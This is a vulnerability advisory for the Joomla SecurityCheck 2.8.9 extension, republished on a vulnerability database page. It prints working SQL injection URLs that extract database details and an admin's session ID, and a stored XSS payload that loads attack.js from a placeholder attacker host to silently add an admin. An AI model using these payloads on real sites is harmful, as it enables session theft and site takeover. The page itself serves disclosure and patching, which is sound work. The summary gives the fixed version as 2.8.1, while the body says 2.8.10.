Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection

🗓️ 01 Jun 2016 00:00:00Reported by Muhammet DilmacType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

Joomla SecurityCheck 2.8.9 Cross Site Scripting / SQL Injection Advisory by ADEO Security Team. Stored XSS and SQL Injection in SecurityCheck and SecurityCheck Pro. High severity. Fixed in v2.8.1

Code
`Information  
------------------------------  
Advisory by ADEO Security Team  
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension  
Affected Software : SecurityCheck and SecurityCheck Pro  
Vulnerable Versions: 2.8.9 (possibly below)  
Vendor Homepage : https://securitycheck.protegetuordenador.com  
Vulnerabilities Type : XSS and SQL Injection  
Severity : High  
Status : Fixed  
  
Technical Details  
------------------------------  
PoC URLs for SQL Injection  
  
For determining database, user and version.  
  
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1  
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1  
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1  
  
For steal admin's session ID (If admin is not online, page response with  
attack detected string. If online, response with admin's session ID)  
  
http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT  
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON  
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %  
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1  
  
PoC URLs for XSS  
  
Add a new admin to website silently while admin checking SecurityCheck logs  
  
http://website/index.php?option=<script>var script =  
document.createElement('script');script.src = "http://ATTACKER/attack.js  
";document.getElementsByTagName('head')[0].appendChild(script);</script>  
  
attack.js  
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca  
  
  
Disclosure Timeline  
------------------------------  
24/05/2016 SQL injection found  
30/05/2016 Worked on one-shot exploit for SQLi  
30/05/2016 While we were working on SQLi payload we also found XSS  
31/05/2016 XSS payload prepared  
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador  
31/05/2016 Vulnerabilities fixed in v2.8.10  
  
Solution  
------------------------------  
Update to the latest version of SecurityCheck (2.8.10)  
  
Credits  
------------------------------  
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and  
Muhammet Dilmac (muhammetdilmac.com.tr).  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jun 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
joomla securitycheck adeo security team cross site scripting sql injection fixed version high severity gokmen guresci muhammet dilmac
31